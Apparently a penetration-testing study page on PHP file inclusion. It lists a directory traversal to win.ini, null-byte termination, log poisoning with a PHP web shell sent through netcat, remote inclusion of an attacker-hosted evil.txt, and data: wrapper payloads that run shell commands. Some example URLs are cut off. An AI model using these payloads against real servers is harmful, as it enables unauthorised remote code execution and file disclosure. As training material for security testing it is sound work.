File inclusion

File inclusion vulnerabilities allow an attacker to include a file into the application's running code. Local file inclusions occur when a file is loaded from the web server hosting the application; whereas, remote file inclusions include a file loaded from an external source. These vulnerabilities are most commonly found in PHP applications.


File inclusions are identified in the same way as directory traversals--by identifying parameters and attempting to manipulate them. If we locate URLs that include parameters, we should test for both vulnerabilities.

  • Look for any instances where a web application retrieves files and includes contents from the file in the reponse (templates, documents/images/framed content)

  • For LFI we attempt to access system files /../../../Windows/win.ini

  • If successful, we can attempt to read files already stored on the server.

  • Impact ranges from disclosure to remote code execution

In PHP versions below 5.3, terminate the request with a null byte "(%00)"

Contaminating log files

Use netcat to connect to the target machine on port 80, then send the following command:

<?php echo '<pre>' . shell_exec($_GET[‘cmd’]) . '</pre>';?>

Although we receive a "Bad Request" in netcat, the command is stored in the server's logs. Once logged, we can attempt command execution.\xampp\apache\logs\access.log&cmd=ipconfig

If successful, the successful ipconfig output will be returned

Remote File Inclusion

RFIs are less common than LFIs due to typical default server configuration restrictions.

If successful, we can modify evil.txt with PHP similar to used in the log file example to gain remote code execution.

PHP wrappers

PhP provides several data wrappers that can be used to exploit directory traversal and LFI vulnerabilities. The data wrappers allows us to embed inline data into the URL in plaintext or Base64. This can be used as an alterative when we cannot poison a local file with PHP code.

  • The wrapper begins with "data:", followed by the type of data "text/plain,". The contents of the data begin after the comma.

  • Test: http://ipaddress/menu.php?file=data:text/plain, hello world

  • If the test succeeds, we can attempt to use php to execute commands

    • http://ipaddress/menu.php?file=data:text/plain,<?php echo shell exec("dir")?>

Last updated